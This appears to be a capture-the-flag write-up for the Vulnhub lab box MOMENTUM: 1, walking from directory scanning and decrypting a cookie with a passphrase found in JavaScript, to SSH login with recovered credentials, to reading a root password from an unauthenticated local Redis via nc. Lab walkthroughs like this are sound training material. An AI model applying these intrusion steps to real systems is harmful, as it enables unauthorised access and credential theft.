Vulnhub: MOMENTUM: 1

MOMENTUM: 1

This is MOMENTUM: 1 from Vulnhub. It says that it is ‘easy/medium’; ok.

Ports

SSH and HTTP only.

Web

The basic dirsearch:

python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.211

shows me /js and not much else. Javascript isn’t usually very interesting in a CTF but I look anyway; we have this:

function viewDetails(str) {

  window.location.href = "opus-details.php?id="+str;
}

/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/

Okay, we have a crypto function and a passphrase. I visit the opus-details.php and try a quick LFI with the id parameter; nothing. The box has set a cookie for us:

U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt

And that looks suspicious to me. Over to JSFiddle, where I have this in the html:

<head>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
</head>

And this in the JS:

var encrypted = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt";
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));

And in the console log, I get this:

auxerre-alienum##

The maker of our box is alienum:

Author: AL1ENUM

A few goes with SSH reveals we have a login with:

auxerre:auxerre-alienum##

Privesc

What happens when we get there?

┌──(root💀kali)-[/opt/vulnhub/momentum]
└─# ssh [email protected] 
[email protected] password: 
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ sudo -l
-bash: sudo: command not found

No sudo? I am disappoint.

I run linpeas and see this:

redis 469 0.1 0.4 51672 9548 ? Ssl 06:30 0:06 /usr/bin/redis-server 127.0.0.1:6379

Let’s try that:

auxerre@Momentum:/dev/shm$ nc localhost 6379
KEYS *
*1
$8
rootpass
get rootpass
$18
m0mentum-al1enum##
quit
+OK
auxerre@Momentum:/dev/shm$ su root
Password: 
root@Momentum:/dev/shm# cd /root
root@Momentum:~# ls 
root.txt
root@Momentum:~# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Momentum
Thu 29 Apr 2021 07:42:50 AM EDT
root@Momentum:~# 

And done.